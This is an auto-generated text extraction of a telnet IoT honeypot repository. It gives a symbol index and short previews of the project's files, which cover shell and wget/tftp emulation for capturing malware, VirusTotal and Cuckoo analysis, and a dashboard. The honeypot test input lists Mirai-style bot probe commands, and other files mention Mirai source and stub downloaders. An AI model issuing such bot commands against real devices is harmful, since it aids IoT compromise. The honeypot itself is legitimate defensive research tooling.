method sendDAT (line 127) | def sendDAT(self):
method sendACK (line 159) | def sendACK(self, blocknumber=None):
method sendError (line 174) | def sendError(self, errorcode):
method sendOACK (line 185) | def sendOACK(self):
method resendLast (line 196) | def resendLast(self):
method handleDat (line 207) | def handleDat(self, pkt):
class TftpStateServerRecvRRQ (line 248) | class TftpStateServerRecvRRQ(TftpState):
method handle (line 251) | def handle(self, pkt, raddress, rport):
class TftpStateServerRecvWRQ (line 293) | class TftpStateServerRecvWRQ(TftpState):
method handle (line 296) | def handle(self, pkt, raddress, rport):
class TftpStateServerStart (line 327) | class TftpStateServerStart(TftpState):
method handle (line 331) | def handle(self, pkt, raddress, rport):
class TftpStateExpectACK (line 349) | class TftpStateExpectACK(TftpState):
method handle (line 354) | def handle(self, pkt, raddress, rport):
class TftpStateExpectDAT (line 388) | class TftpStateExpectDAT(TftpState):
method handle (line 390) | def handle(self, pkt, raddress, rport):
class TftpStateSentWRQ (line 413) | class TftpStateSentWRQ(TftpState):
method handle (line 415) | def handle(self, pkt, raddress, rport):
class TftpStateSentRRQ (line 471) | class TftpStateSentRRQ(TftpState):
method handle (line 473) | def handle(self, pkt, raddress, rport):
FILE: util/config.py
function rand (line 5) | def rand():
class Config (line 9) | class Config:
method __init__ (line 10) | def __init__(self):
method loadyaml (line 18) | def loadyaml(self, filename):
method loadUserConfig (line 23) | def loadUserConfig(self, filename):
method get (line 29) | def get(self, key, optional=False, default=None):
FILE: util/dbg.py
function dbg (line 8) | def dbg(msg):
Condensed preview — 82 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (346K chars).
[
{
"path": ".gitignore",
"chars": 144,
"preview": "*.pyc\n*.db\nsamples/\nMirai-Source-Code-master/\nobf.py\nimport-lost-conns.py\nimport-length.py\nreview-sampels.py\n*.kate-swp\n"
},
{
"path": "Dockerfile",
"chars": 195,
"preview": "FROM python:2\n\nWORKDIR /usr/src/app\n\nCOPY ./requirements.txt ./\nRUN pip install --no-cache-dir -r requirements.txt\nRUN p"
},
{
"path": "INSTALL.md",
"chars": 3686,
"preview": "# Installation\n\nFor installation instructions, go to section Manual installation.\nHowever, if you just want to get every"
},
{
"path": "README.md",
"chars": 4124,
"preview": "## Disclaimer\n\nThis project neither supported or in development anymore. It is based on python2 which has reached its EO"
},
{
"path": "backend/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "backend/additionalinfo.py",
"chars": 2836,
"preview": "import dns.resolver\nimport ipaddress\nimport urlparse\nimport re\nimport traceback\n\nimport ipdb.ipdb\n\ndef filter_ascii(stri"
},
{
"path": "backend/authcontroller.py",
"chars": 1969,
"preview": "import os\nimport hashlib\nimport traceback\nimport struct\nimport json\nimport time\n\nimport additionalinfo\nimport ipdb.ipdb\n"
},
{
"path": "backend/backend.py",
"chars": 7450,
"preview": "from flask import Flask, request, Response, redirect, send_from_directory\nfrom flask_httpauth import HTTPBasicAuth\nfrom "
},
{
"path": "backend/clientcontroller.py",
"chars": 13057,
"preview": "import os\nimport hashlib\nimport traceback\nimport struct\nimport json\nimport time\nimport socket\nimport urlparse\nimport ran"
},
{
"path": "backend/cuckoo.py",
"chars": 3086,
"preview": "import json\nimport os\ntry:\n from urllib.parse import urlparse, urljoin\nexcept ImportError:\n from urlparse import u"
},
{
"path": "backend/db.py",
"chars": 16947,
"preview": "import time\nimport json\nimport sqlalchemy\nimport random\n\nfrom decorator import decorator\n\nfrom sqlalchemy import Table, "
},
{
"path": "backend/ipdb/.gitignore",
"chars": 12,
"preview": "*.CSV\n*.csv\n"
},
{
"path": "backend/ipdb/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "backend/ipdb/ipdb.py",
"chars": 2113,
"preview": "\nimport csv\nimport ipaddress\nimport struct\nimport os\n\ndef ipstr2int(ip):\n\tip = unicode(ip)\n\tip = ipaddress.IPv4Address(i"
},
{
"path": "backend/virustotal.py",
"chars": 2259,
"preview": "import requests\nimport time\nimport db\nimport Queue\n\nfrom util.config import config\n\n\nclass QuotaExceededError(Exception)"
},
{
"path": "backend/virustotal_fill_db.py",
"chars": 828,
"preview": "import os\n\nfrom util.dbg import dbg\nfrom virustotal import Virustotal\nfrom sampledb import Sampledb\n\nvt = Virustotal()\n"
},
{
"path": "backend/webcontroller.py",
"chars": 7682,
"preview": "import os\nimport hashlib\nimport traceback\nimport struct\nimport json\nimport time\nimport math\n\nimport additionalinfo\nimpor"
},
{
"path": "backend.py",
"chars": 1950,
"preview": "import sys\nimport json\nimport traceback\n\nfrom util.config import config\n\nif len(sys.argv) > 1 and sys.argv[1] == \"cleard"
},
{
"path": "config.dist.yaml",
"chars": 2509,
"preview": "# This is the default (distribution) config file\n# For local configuration, please create and edit the file \"config.yaml"
},
{
"path": "create_config.sh",
"chars": 293,
"preview": "#!/bin/bash\n\nif [ -f config.yaml ]; then\n\techo \"config.yaml already exists, aborting\"\n\texit\nfi\n\nuser=admin\npass=$(openss"
},
{
"path": "create_docker.sh",
"chars": 2451,
"preview": "#!/bin/bash\n\nif [ -f config.yaml ]; then\n\techo -n \"config.yaml already exists, delete it? (Y/n): \"\n\tread force\n\tif [ \"$f"
},
{
"path": "honeypot/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "honeypot/__main__.py",
"chars": 206,
"preview": "import signal\n\nfrom telnet import Telnetd\nfrom util.dbg import dbg\n\ndef signal_handler(signal, frame):\n\tdbg('Ctrl+C')\n\ts"
},
{
"path": "honeypot/client.py",
"chars": 1717,
"preview": "import requests\nimport requests.exceptions\nimport requests.auth\n\nimport json\n\nfrom util.dbg import dbg\nfrom util.config "
},
{
"path": "honeypot/sampledb_client.py",
"chars": 3092,
"preview": "import client\nimport time\nimport traceback\nimport os\nimport requests\nimport hashlib\nimport json\n\nfrom util.dbg import db"
},
{
"path": "honeypot/session.py",
"chars": 1969,
"preview": "import re\nimport random\nimport time\nimport json\nimport traceback\n\nimport struct\nimport socket\nimport select\nimport errno"
},
{
"path": "honeypot/shell/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "honeypot/shell/commands/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "honeypot/shell/commands/base.py",
"chars": 5326,
"preview": "import sys\nimport traceback\n\nfrom binary import run_binary\n\nclass Proc:\n procs = {}\n\n @staticmethod\n def regist"
},
{
"path": "honeypot/shell/commands/binary.py",
"chars": 2521,
"preview": "\nimport socket\nimport struct\nimport select\n\ndef dbg(s):\n print s\n\ndef run_binary(data, fname, args, env):\n dbg(\"Pa"
},
{
"path": "honeypot/shell/commands/cmd_util.py",
"chars": 227,
"preview": "from getopt import gnu_getopt, GetoptError\n\ndef easy_getopt(args, opt, longopts=[]):\n\toptlist, args = gnu_getopt(args, o"
},
{
"path": "honeypot/shell/commands/shell.py",
"chars": 675,
"preview": "from base import Proc\n\nclass Shell(Proc):\n \n def run(self, env, args):\n from honeypot.shell.shell import ru"
},
{
"path": "honeypot/shell/commands/shellcode.py",
"chars": 1641,
"preview": "\nfrom base import Proc\n\nclass Shellcode():\n\n\tdef run(self, data):\n\t\tdbg(\"Parsing stub downloader (\" + str(len(data))"
},
{
"path": "honeypot/shell/commands/tftp.py",
"chars": 2586,
"preview": "#!/usr/bin/env python\n\nimport io\nimport traceback\n\nfrom getopt import gnu_getopt, GetoptError\nfrom tftpy import TftpCli"
},
{
"path": "honeypot/shell/commands/wget.py",
"chars": 3404,
"preview": "\nimport requests\nimport traceback\nimport datetime\nimport urlparse\n\nfrom util.config import config\n\nfrom base import "
},
{
"path": "honeypot/shell/grammar.peg",
"chars": 1109,
"preview": "grammar cmd\n\ncmd <- cmdlist / empty\ncmdlist <- cmdsingle (sep (\";\" / \"&\") sep cmdlist)? "
},
{
"path": "honeypot/shell/grammar.py",
"chars": 48209,
"preview": "from collections import defaultdict\nimport re\n\n\nclass TreeNode(object):\n def __init__(self, text, offset, elements=No"
},
{
"path": "honeypot/shell/shell.py",
"chars": 14825,
"preview": "import sys\nimport traceback\n\nfrom grammar import parse, TreeNode\nfrom commands.base import Proc\n\ndef filter_ascii("
},
{
"path": "honeypot/shell/test.sh",
"chars": 76,
"preview": "#!/bin/bash\ncanopy grammar.peg --lang python && python shell.py < test.txt\n\n"
},
{
"path": "honeypot/shell/test.txt",
"chars": 4565,
"preview": "cp\nls\ncat\ndd\nrm\necho\nbusybox\nsh\ncd\ntrue\nfalse\nchmod\nuname\n:\nps\n\nenable\nshell\nsh\n/bin/busybox ECCHI\n/bin/busybox ps; /bin"
},
{
"path": "honeypot/telnet.py",
"chars": 5669,
"preview": "import struct\nimport socket\nimport traceback\nimport time\n\nfrom thread import start_new_thread\n\nfrom session import Sessi"
},
{
"path": "honeypot.py",
"chars": 2072,
"preview": "import os\nimport sys\nimport signal\nimport json\nimport socket\n\nfrom honeypot.telnet import Telnetd\nfrom honeypot.cli"
},
{
"path": "html/.gitignore",
"chars": 17,
"preview": "db.php\napiurl.js\n"
},
{
"path": "html/admin.html",
"chars": 1513,
"preview": "<img src=\"img/icon.svg\" style=\"height: 10em; margin-top: -4em; padding: 1em; background: white;\" class=\"pull-right\">\n\n<d"
},
{
"path": "html/asn.html",
"chars": 961,
"preview": "<h1>ASN Info</h1>\n\n<table class=\"table\">\n\n\t<tr><td>Name</td><td><b>{{ asn.name }}</b></td></tr>\n\t<tr><td>Country</td><td"
},
{
"path": "html/common.js",
"chars": 2170,
"preview": "\nvar fakenames = [\"Boar\",\"Stallion\",\"Yak\",\"Beaver\",\"Salamander\",\"Eagle Owl\",\"Impala\",\"Elephant\",\"Chameleon\",\"Argali\",\"Le"
},
{
"path": "html/connection.html",
"chars": 3748,
"preview": "<h1>Connection Info</h1>\n\n<table class=\"table\">\n\n\t<tr><td>Date</td><td>{{ formatDate(connection.date) }}</td></tr>\n\t<tr>"
},
{
"path": "html/connectionlist-embed.html",
"chars": 1290,
"preview": "<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th>Date</th>\n\t\t<th ng-show=\"!filter['ip']\">IP</th>\n\t\t<th ng-show=\"!filte"
},
{
"path": "html/connectionlist.html",
"chars": 985,
"preview": "<h2>Connections</h2>\n\n<div class=\"well well-sm\" style=\"font-family: monospace\">\n\t<div style=\"font-size: 0.7em;\">\n\t\tFilte"
},
{
"path": "html/countries.js",
"chars": 4674,
"preview": "var COUNTRY_LIST = {\"AF\":\"Afghanistan\",\"AX\":\"Åland Islands\",\"AL\":\"Albania\",\"DZ\":\"Algeria\",\"AS\":\"American Samoa\",\"AD\":\"An"
},
{
"path": "html/fancy/connhash/index.html",
"chars": 2632,
"preview": "<!doctype html>\n<html>\n<head>\n <title>Network | Hierarchical layout</title>\n\n <style type=\"text/css\">\n body"
},
{
"path": "html/fancy/graph/index.html",
"chars": 4946,
"preview": "<html>\n<head>\n\n<meta charset=\"utf-8\"/>\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n\n<script src"
},
{
"path": "html/img/LICENSE",
"chars": 129,
"preview": "Bee Icon by alican\nhttps://thenounproject.com/search/?q=bee&i=573797\nCC BY 3.0 (https://creativecommons.org/licenses/by/"
},
{
"path": "html/img/flags/LICENSE",
"chars": 509,
"preview": "Flag icons - http://www.famfamfam.com\n\nThese icons are public domain, and as such are free for any use (attribution appr"
},
{
"path": "html/index.html",
"chars": 3601,
"preview": "<html>\n<head>\n\n<meta charset=\"utf-8\"/>\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n\n\n<link rel="
},
{
"path": "html/js/angular-vis.js",
"chars": 7569,
"preview": "angular.module('ngVis', [])\n\n .factory('VisDataSet', function () {\n 'use strict';\n return function (dat"
},
{
"path": "html/network.html",
"chars": 1828,
"preview": "\n<h1>Network Info</h1>\n<div class=\"row\">\n\t<div class=\"col-md-6 col-xs-12\">\n\t\t<table class=\"table\">\n\n\t\t\t<tr><td>id</td><t"
},
{
"path": "html/networks.html",
"chars": 1090,
"preview": "<h1>Networks</h1>\n\n<!--<h2>Connections from the Network <small><a href=\"#/connections?network_id={{ network.id }}\">see a"
},
{
"path": "html/overview.html",
"chars": 2932,
"preview": "<img src=\"img/icon.svg\" style=\"height: 10em; margin-top: -4em; padding: 1em; background: white;\" class=\"pull-right\">\n\n<d"
},
{
"path": "html/sample.html",
"chars": 1418,
"preview": "<h1>Sample Info</h1>\n\n<table class=\"table\">\n\n\t<tr><td>First seen</td><td>{{ formatDate(sample.date) }}</td></tr>\n\t<tr><t"
},
{
"path": "html/sample.js",
"chars": 16805,
"preview": "var isMobile = false; //initiate as false\n// device detection\nif(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberr"
},
{
"path": "html/samples.html",
"chars": 598,
"preview": "<h2>Samples</h2>\n\n<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th class=\"hidden-xs\">SHA256</th>\n\t\t<th>Name</th>\n\t\t<th"
},
{
"path": "html/tag.html",
"chars": 331,
"preview": "<h1>Tag Info</h1>\n\n<table class=\"table\">\n\n\t<tr><td>Name</td><td>{{ tag.name }}</td></tr>\n\t<tr><td>Code</td><td><span sty"
},
{
"path": "html/tags.html",
"chars": 336,
"preview": "<h1>Tags</h1>\n\n<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th>Name</th>\n\t\t<th>Code</th>\n\t\t<th>N⁰ Hits</th>\n\t</tr>\n\t<"
},
{
"path": "html/url.html",
"chars": 1558,
"preview": "<h1>URL Info</h1>\n\n<table class=\"table\">\n\n\t<tr><td>URL</td><td>{{ url.url }}</td></tr>\n\t<tr><td>First seen</td><td>{{ fo"
},
{
"path": "html/urls.html",
"chars": 782,
"preview": "<h1>Urls</h1>\n\n<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th>Country</th>\n\t\t<th>Url</th>\n\t\t<th>Date</th>\n\t\t<th clas"
},
{
"path": "requirements.txt",
"chars": 140,
"preview": "setuptools\nwerkzeug\nflask\nflask-httpauth\nflask-socketio\nsqlalchemy\nrequests\ndecorator\ndnspython\nipaddress\nsimpleeval\npyy"
},
{
"path": "tftpy/TftpClient.py",
"chars": 4917,
"preview": "\"\"\"This module implements the TFTP Client functionality. Instantiate an\ninstance of the client, and then use its upload "
},
{
"path": "tftpy/TftpContexts.py",
"chars": 14487,
"preview": "\"\"\"This module implements all contexts for state handling during uploads and\ndownloads, the main interface to which bein"
},
{
"path": "tftpy/TftpPacketFactory.py",
"chars": 1454,
"preview": "\"\"\"This module implements the TftpPacketFactory class, which can take a binary\nbuffer, and return the appropriate TftpPa"
},
{
"path": "tftpy/TftpPacketTypes.py",
"chars": 16397,
"preview": "\"\"\"This module implements the packet types of TFTP itself, and the\ncorresponding encode and decode methods for them.\"\"\"\n"
},
{
"path": "tftpy/TftpServer.py",
"chars": 8846,
"preview": "\"\"\"This module implements the TFTP Server functionality. Instantiate an\ninstance of the server, and then run the listen("
},
{
"path": "tftpy/TftpShared.py",
"chars": 1734,
"preview": "\"\"\"This module holds all objects shared by all other modules in tftpy.\"\"\"\n\nimport logging\n\nLOG_LEVEL = logging.NOTSET\nMI"
},
{
"path": "tftpy/TftpStates.py",
"chars": 23405,
"preview": "\"\"\"This module implements all state handling during uploads and downloads, the\nmain interface to which being the TftpSta"
},
{
"path": "tftpy/__init__.py",
"chars": 755,
"preview": "\"\"\"\nThis library implements the tftp protocol, based on rfc 1350.\nhttp://www.faqs.org/rfcs/rfc1350.html\nAt the moment it"
},
{
"path": "util/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "util/config.py",
"chars": 972,
"preview": "import yaml\nimport random\nimport string\n\ndef rand():\n\tchars = string.ascii_uppercase + string.digits\n\treturn ''.join(ran"
},
{
"path": "util/dbg.py",
"chars": 347,
"preview": "import datetime\nimport traceback\nimport sys\nimport os.path\n\nDEBUG = True\n\ndef dbg(msg):\n\tif DEBUG:\n\t\tnow = datetime.dat"
},
{
"path": "vagrant/.gitignore",
"chars": 16,
"preview": ".vagrant\n*.log\n\n"
},
{
"path": "vagrant/mariadb/Vagrantfile",
"chars": 3672,
"preview": "# -*- mode: ruby -*-\n# vi: set ft=ruby :\n\n# All Vagrant configuration is done below. The \"2\" in Vagrant.configure\n# conf"
},
{
"path": "vagrant/mariadb/mysql.sh",
"chars": 614,
"preview": "#/bin/bash\n\necho \" - Install MariaDB\"\nsudo apt-get install -y mariadb-server\n\nuser=honey\ndb=honey\npw=$(openssl rand -hex"
},
{
"path": "vagrant/sqlite/Vagrantfile",
"chars": 3601,
"preview": "# -*- mode: ruby -*-\n# vi: set ft=ruby :\n\n# All Vagrant configuration is done below. The \"2\" in Vagrant.configure\n# conf"
}
]
About this extraction
This page contains the full source code of the Phype/telnet-iot-honeypot GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 82 files (309.8 KB), approximately 84.1k tokens, and a symbol index with 493 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.